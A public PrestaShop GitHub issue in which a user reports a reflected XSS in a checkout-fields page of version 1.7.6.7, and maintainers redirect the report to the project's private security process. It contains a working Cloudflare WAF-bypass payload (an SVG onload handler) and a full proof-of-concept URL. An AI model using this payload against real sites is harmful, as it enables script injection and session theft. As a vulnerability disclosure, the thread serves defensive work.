### ISSUE TITLE
 Reflected XSS + WAF Bypass

### ISSUE THREAD

**Issue by b4d4** [PrestaShop/PrestaShop#28876]
### Prerequisites

- [X] I understand and accept the project's [code of conduct](https://github.com/PrestaShop/PrestaShop/blob/develop/CODE_OF_CONDUCT.md)
- [X] I have already [searched in existing issues](https://github.com/PrestaShop/PrestaShop/issues?q=is%3Aissue+label%3ABug) and found no previous report of this bug.

### Describe the bug and add screenshots

Reflected XSS in https://domain.com/ allows attacker to run arbitrary javascript in the context of the victim. There is a cloudflare waf present but it was successfully bypassed using the payload: 1<X><Svg Only=1 Onload=confirm(document.domain)> https://domain.com/checkout-fields?type=1%3CX%3E%3CSvg%20Only=1%20Onload=confirm(document.domain)%3E

### Steps to reproduce

1.	Visit the URL and see pop-up of domain: https://domain.com/checkout-fields?type=1%3CX%3E%3CSvg%20Only=1%20Onload=confirm(document.domain)%3E

### PrestaShop version(s) where the bug happened

1.7.6.7

**Comment by b4d4** [comment]
Hello, it is not version 1.6

**Comment by AureRita** [comment]
Hi @b4d4 ,

Yes, Indead, sorry for my misunderstanding, can you give us more information to reproduce your issue in our shop and work on it. You must follow the template and provide clear and concise steps to reproduce the bug. 

Thanks

**Comment by okom3pom** [comment]
Thank you for not detailing. [Please use this form ](https://github.com/PrestaShop/PrestaShop/security/policy)

**Comment by b4d4** [comment]
Okey, i will contact with security tema. Thanks.
